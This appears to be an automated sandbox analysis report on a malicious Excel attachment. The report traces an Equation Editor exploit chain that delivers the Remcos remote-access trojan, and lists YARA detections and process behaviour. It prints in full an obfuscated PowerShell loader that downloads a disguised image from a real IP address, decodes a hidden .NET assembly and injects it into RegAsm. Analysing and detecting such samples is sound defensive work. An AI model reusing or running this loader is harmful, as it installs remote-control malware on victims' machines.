Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('YRClink = SEGhttp://'+'91.92.254.194/'+'imge/new-image_v.jp'+'gSEG; YRCwebClient = New-Object System.Net.WebClient'+'; try { YRCdownloadedData = YRCwebClient.DownloadData(YRClink) } catch { Write-Host SEGFailed To download data from YRClinkSEG -ForegroundColor Red; exi'+'t }; if (YRCdownloadedData -ne YRCnull) { YRCimageText = [System.Text.Encoding]::UTF8.GetString(YR'+'CdownloadedData); YRCstartFlag = SEG<<BASE64_START>>SEG; YRCendFlag = SEG<<BASE64_END>>SEG; YRCstartIndex = YRCimageText.IndexO'+'f(YRCstartFlag); '+'YRCendIndex = YRCimageTe'+'xt.IndexOf(YRCen'+'dFlag); if (YRCstartIndex -ge 0 -and YRCendIndex -gt YRCstartIndex) { YRCstartIndex += YRCstartFlag.Length; YRCbase64Length'+' = YRCendIndex '+'- YRCstartIndex; Y'+'RCbase64Command = YRCimageText.Substring(YRCstartIndex, YRCbase64Length); YRCcommandBytes = [System.Convert]::FromBas'+'e64'+'String(YR'+'Cbas'+'e64Command);'+' YRCloadedAssembly = [System.Reflection.Assembly]::Lo'+'ad(YRCcommandBytes); YRCtype = YRCloade'+'dAssembly.GetType(SEGRunPE.'+'HomeSEG); YRCmethod = '+'YRCtype.GetMethod(SEGVAISEG).Invoke(YRCnull, [object[]] (SEGtxt.SSERW/23099/831.65.232.271//:ptth'+'SEG , SEGdesativadoSEG , SEGdesativadoSEG , SEGdesativadoSEG,SEGRegAsmSEG,SEGSEG)) } }Set Scriptblock YRClink = SEGhttp://91.92.254.194/imge/new'+'-i'+'mage_v.jpgSE'+'G; YRCwebClient = Ne'+'w-Object System.Net.WebClient; try { YRCdownloadedDa'+'ta = YRCwebCli'+'ent.DownloadData(YRCl'+'ink) } catch { Wri'+'te-Host SEGFailed To download data from YRClinkSEG '+'-ForegroundColor Red; exit }; if (YRCdownloadedData -ne YRCnull) { Y'+'RCim'+'ageText = [System.Text.Encoding]::UTF8.GetString(YRCdownl'+'oadedData); YRCstartFlag = SEG<<BASE64_START>>SEG; YRCendFlag = SEG<<BASE64_END>>SEG; YRCstartIndex '+'= YRCimageText.IndexOf(YRCstartFlag); YRCend'+'In'+'dex = YRCimageText.IndexOf(YRCendFlag)'+'; if (YRCstar'+'tIndex -ge 0 -and YRCendIndex -gt YRCstartIndex) { YRCstartIndex += YRCstartFlag.Length; YRCbase64'+'Length = YRCendIndex - YRCstartIndex; YRCbase64Command = YRCimageText.Substr'+'ing(YRCstartIndex, YRCbase64Length); '+'YRCcommandBytes = [System.Convert]::FromBase64String(YRCbase64Command); YRCloadedAssembly = [System.Reflection.Assembly]::Load(YRCcomm'+'andBytes); YRCtype = YRCloadedAssembly.GetType(SEGRunPE'+'.HomeSEG); YRCmethod = YRCtype.GetMethod(SEGVAISEG).Invoke(Y'+'RCnull, [object[]] (SEGtxt.SSERW/23099/831.65.232.271//:ptthSE'+'G , S'+'EGdesativadoSEG , SEGdesativadoSEG , SEGdesativadoSEG,SEGRegAsmSEG,SEGSEG)) } }Set Scriptblock YRClink = SEGhttp://91.92.254.194/imge/new-image_v.jpgSEG; YRCwebClient = New-O'+'bject Sys'+'tem.Net.WebClient; try'+' { Y'+'RCdownloadedData = YRCwebClient.DownloadData(YRClink) } catch { Write-Host'+' SEGFailed To download data from '+'YRClinkSEG -ForegroundColor Red; exit }; if ('+'YRCdownloadedData -ne YRCnull) { YRCimageText '+'= [System.Text.Encoding]::UTF8			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process Stats: CPU usage > 49%

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,

11_2_004167B4

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 6_2_005ADCB0	6_2_005ADCB0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_001F8A57	9_2_001F8A57
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_001F8A87	9_2_001F8A87
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_001F8BD9	9_2_001F8BD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0043E0CC	11_2_0043E0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0041F0FA	11_2_0041F0FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00454159	11_2_00454159
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00438168	11_2_00438168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_004461F0	11_2_004461F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0043E2FB	11_2_0043E2FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0045332B	11_2_0045332B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0042739D	11_2_0042739D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_004374E6	11_2_004374E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0043E558	11_2_0043E558
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00438770	11_2_00438770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_004378FE	11_2_004378FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00433946	11_2_00433946
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0044D9C9	11_2_0044D9C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00427A46	11_2_00427A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0041DB62	11_2_0041DB62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00427BAF	11_2_00427BAF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00437D33	11_2_00437D33
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00435E5E	11_2_00435E5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00426E0E	11_2_00426E0E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0043DE9D	11_2_0043DE9D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00413FCA	11_2_00413FCA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00436FEA	11_2_00436FEA

Source: Swift tract-20240506_120.xls

OLE indicator, VBA macros: true

Source: ~WRF{AB6DAD69-2E1E-438B-868F-672C91416C1F}.tmp.4.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00434E10 appears 54 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00402093 appears 50 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00434770 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00401E65 appears 34 times

Source: 9.2.powershell.exe.39e5af8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 9.2.powershell.exe.39e5af8.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 9.2.powershell.exe.39e5af8.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 9.2.powershell.exe.39e5af8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 9.2.powershell.exe.39e5af8.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000009.00000002.454028301.0000000003559000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000009.00000002.454028301.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 3196, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 3196, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: RegAsm.exe PID: 3332, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\hu.hu.huhuh[1].doc, type: DROPPED	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D58E1F0C.doc, type: DROPPED	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winXLS@9/34@7/7

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,

11_2_00417952

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,

11_2_0040F474

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,

11_2_0041B4A8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

11_2_0041AA4A

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\GKICFQZW.txt

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-Y7DJPP

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR8E79.tmp

Jump to behavior

Source: Swift tract-20240506_120.xls	OLE indicator, Workbook stream: true
Source: 56630000.0.dr	OLE indicator, Workbook stream: true

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodflowersandgoodreturn.vBS"

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................b_.........................s............................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................o_.........................s............(...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................'.=.'...(.P.............................._.........................s............(...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................._.........................s............(...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.0.3.9...._.........................s............(.......&.......................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................t........_.........................s............(...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................t........_.........................s............................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................t........_.........................s............(...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................t........_.........................s............................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................._.........................s............(...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..............................`.........................s............................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..............................`.........................s............(...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .n.d.i.n.g.E.x.c.e.p.t.i.o.n.......(`.........................s............(.......".......................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................t.......5`.........................s............(...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................t.......I`.........................s............................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................t.......V`.........................s............(...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . ...C.o.m.m.a.n.d.s...S.e.t.V.a.r.i.a.b.l.e.C.o.m.m.a.n.d......s............(.......>.......................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..................... .......y`.........................s............(...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P..................... ........`.........................s............(...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..................... ........`.........................s............(...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................F.a.i.l.e.d. .T.o. .d.o.w.n.l.o.a.d. .d.a.t.a. .f.r.o.m. .$.l.i.n.k.............(.......D..........s............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..................... .......]a......................n.k.............(...............................	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Swift tract-20240506_120.xls	ReversingLabs: Detection: 18%
Source: Swift tract-20240506_120.xls	Virustotal: Detection: 26%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodflowersandgoodreturn.vBS"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('YRClink = SEGhttp://'+'91.92.254.194/'+'imge/new-image_v.jp'+'gSEG; YRCwebClient = New-Object System.Net.WebClient'+'; try { YRCdownloadedData = YRCwebClient.DownloadData(YRClink) } catch { Write-Host SEGFailed To download data from YRClinkSEG -ForegroundColor Red; exi'+'t }; if (YRCdownloadedData -ne YRCnull) { YRCimageText = [System.Text.Encoding]::UTF8.GetString(YR'+'CdownloadedData); YRCstartFlag = SEG<<BASE64_START>>SEG; YRCendFlag = SEG<<BASE64_END>>SEG; YRCstartIndex = YRCimageText.IndexO'+'f(YRCstartFlag); '+'YRCendIndex = YRCimageTe'+'xt.IndexOf(YRCen'+'dFlag); if (YRCstartIndex -ge 0 -and YRCendIndex -gt YRCstartIndex) { YRCstartIndex += YRCstartFlag.Length; YRCbase64Length'+' = YRCendIndex '+'- YRCstartIndex; Y'+'RCbase64Command = YRCimageText.Substring(YRCstartIndex, YRCbase64Length); YRCcommandBytes = [System.Convert]::FromBas'+'e64'+'String(YR'+'Cbas'+'e64Command);'+' YRCloadedAssembly = [System.Reflection.Assembly]::Lo'+'ad(YRCcommandBytes); YRCtype = YRCloade'+'dAssembly.GetType(SEGRunPE.'+'HomeSEG); YRCmethod = '+'YRCtype.GetMethod(SEGVAISEG).Invoke(YRCnull, [object[]] (SEGtxt.SSERW/23099/831.65.232.271//:ptth'+'SEG , SEGdesativadoSEG , SEGdesativadoSEG , SEGdesativadoSEG,SEGRegAsmSEG,SEGSEG)) } }Set Scriptblock YRClink = SEGhttp://91.92.254.194/imge/new'+'-i'+'mage_v.jpgSE'+'G; YRCwebClient = Ne'+'w-Object System.Net.WebClient; try { YRCdownloadedDa'+'ta = YRCwebCli'+'ent.DownloadData(YRCl'+'ink) } catch { Wri'+'te-Host SEGFailed To download data from YRClinkSEG '+'-ForegroundColor Red; exit }; if (YRCdownloadedData -ne YRCnull) { Y'+'RCim'+'ageText = [System.Text.Encoding]::UTF8.GetString(YRCdownl'+'oadedData); YRCstartFlag = SEG<<BASE64_START>>SEG; YRCendFlag = SEG<<BASE64_END>>SEG; YRCstartIndex '+'= YRCimageText.IndexOf(YRCstartFlag); YRCend'+'In'+'dex = YRCimageText.IndexOf(YRCendFlag)'+'; if (YRCstar'+'tIndex -ge 0 -and YRCendIndex -gt YRCstartIndex) { YRCstartIndex += YRCstartFlag.Length; YRCbase64'+'Length = YRCendIndex - YRCstartIndex; YRCbase64Command = YRCimageText.Substr'+'ing(YRCstartIndex, YRCbase64Length); '+'YRCcommandBytes = [System.Convert]::FromBase64String(YRCbase64Command); YRCloadedAssembly = [System.Reflection.Assembly]::Load(YRCcomm'+'andBytes); YRCtype = YRCloadedAssembly.GetType(SEGRunPE'+'.HomeSEG); YRCmethod = YRCtype.GetMethod(SEGVAISEG).Invoke(Y'+'RCnull, [object[]] (SEGtxt.SSERW/23099/831.65.232.271//:ptthSE'+'G , S'+'EGdesativadoSEG , SEGdesativadoSEG , SEGdesativadoSEG,SEGRegAsmSEG,SEGSEG)) } }Set Scriptblock YRClink = SEGhttp://91.92.254.194/imge/new-image_v.jpgSEG; YRCwebClient = New-O'+'bject Sys'+'tem.Net.WebClient; try'+' { Y'+'RCdownloadedData = YRCwebClient.DownloadData(YRClink) } catch { Write-Host'+' SEGFailed To download data from '+'YRClinkSEG -ForegroundColor Red; exit }; if ('+'YRCdownloadedData -ne YRCnull) { YRCimageText '+'= [System.Text.Encoding]::UTF8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodflowersandgoodreturn.vBS"	Jump to behavior
